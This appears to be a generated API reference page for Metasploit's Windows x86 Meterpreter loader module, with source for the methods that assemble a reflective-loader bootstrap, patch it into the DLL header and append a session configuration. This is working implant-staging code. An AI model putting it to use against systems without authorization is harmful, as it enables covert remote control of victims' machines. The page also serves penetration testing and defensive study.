Module: Msf::Payload::Windows::MeterpreterLoader

Includes:
Msf::Payload::Windows, ReflectiveDLLLoader
Defined in:
lib/msf/core/payload/windows/meterpreter_loader.rb

Overview

Common module stub for ARCH_X86 payloads that make use of Meterpreter.

Constant Summary

Constants included from ReflectiveDLLLoader

ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER

Instance Method Summary collapse

Methods included from Msf::Payload::Windows

#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #replace_var

Methods included from PrependMigrate

#apply_prepend_migrate, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64

Methods included from ReflectiveDLLLoader

#load_rdi_dll, #load_rdi_dll_from_data

Instance Method Details

#asm_invoke_metsrv(opts = {}) ⇒ Object 



33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
 
# File 'lib/msf/core/payload/windows/meterpreter_loader.rb', line 33

def asm_invoke_metsrv(opts={})
  asm = %Q^
      ; prologue
        dec ebp               ; 'M'
        pop edx               ; 'Z'
        call $+5              ; call next instruction
        pop ebx               ; get the current location (+7 bytes)
        push edx              ; restore edx
        inc ebp               ; restore ebp
        push ebp              ; save ebp for later
        mov ebp, esp          ; set up a new stack frame
      ; Invoke ReflectiveLoader()
        ; add the offset to ReflectiveLoader() (0x????????)
        add ebx, #{"0x%.8x" % (opts[:rdi_offset] - 7)}
        call ebx              ; invoke ReflectiveLoader()
      ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
        ; offset from ReflectiveLoader() to the end of the DLL
        add ebx, #{"0x%.8x" % (opts[:length] - opts[:rdi_offset])}
  ^

  unless opts[:stageless] || opts[:force_write_handle] == true
    asm << %Q^
        mov [ebx], edi        ; write the current socket/handle to the config
    ^
  end

  asm << %Q^
        push ebx              ; push the pointer to the configuration start
        push 4                ; indicate that we have attached
        push eax              ; push some arbitrary value for hInstance
        call eax              ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr)
  ^
end

#generate_config(opts = {}) ⇒ Object 



71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
 
# File 'lib/msf/core/payload/windows/meterpreter_loader.rb', line 71

def generate_config(opts={})
  ds = opts[:datastore] || datastore
  opts[:uuid] ||= generate_payload_uuid

  # create the configuration block, which for staged connections is really simple.
  config_opts = {
    arch:              opts[:uuid].arch,
    null_session_guid: opts[:null_session_guid] == true,
    exitfunk:          ds[:exit_func] || ds['EXITFUNC'],
    expiration:        (ds[:expiration] || ds['SessionExpirationTimeout']).to_i,
    uuid:              opts[:uuid],
    transports:        opts[:transport_config] || [transport_config(opts)],
    extensions:        [],
    stageless:         opts[:stageless] == true,
  }.merge(meterpreter_logging_config(opts))
  # create the configuration instance based off the parameters
  config = Rex::Payloads::Meterpreter::Config.new(config_opts)

  # return the binary version of it
  config.to_b
end

#initialize(info = {}) ⇒ Object 



17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
 
# File 'lib/msf/core/payload/windows/meterpreter_loader.rb', line 17

def initialize(info = {})
  super(update_info(info,
    'Name'          => 'Meterpreter & Configuration RDI',
    'Description'   => 'Inject Meterpreter & the configuration stub via RDI',
    'Author'        => [ 'sf', 'OJ Reeves' ],
    'References'    => [
      [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
      [ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
    ],
    'Platform'      => 'win',
    'Arch'          => ARCH_X86,
    'PayloadCompat' => { 'Convention' => 'sockedi handleedi -https', },
    'Stage'         => { 'Payload'   => "" }
    ))
end

#stage_meterpreter(opts = {}) ⇒ Object 



93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
 
# File 'lib/msf/core/payload/windows/meterpreter_loader.rb', line 93

def stage_meterpreter(opts={})
  ds = opts[:datastore] || datastore
  debug_build = ds['MeterpreterDebugBuild']
  # Exceptions will be thrown by the mixin if there are issues.
  dll, offset = load_rdi_dll(MetasploitPayloads.meterpreter_path('metsrv', 'x86.dll', debug: debug_build))

  asm_opts = {
    rdi_offset: offset,
    length:     dll.length,
    stageless:  opts[:stageless] == true
  }

  asm = asm_invoke_metsrv(asm_opts)

  # generate the bootstrap asm
  bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string

  # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry
  if bootstrap.length > 62
    raise RuntimeError, "Meterpreter loader (x86) generated an oversized bootstrap!"
  end

  # patch the bootstrap code into the dll's DOS header...
  dll[ 0, bootstrap.length ] = bootstrap

  dll
end

#stage_payload(opts = {}) ⇒ Object 



67
68
69
 
# File 'lib/msf/core/payload/windows/meterpreter_loader.rb', line 67

def stage_payload(opts={})
  stage_meterpreter(opts) + generate_config(opts)
end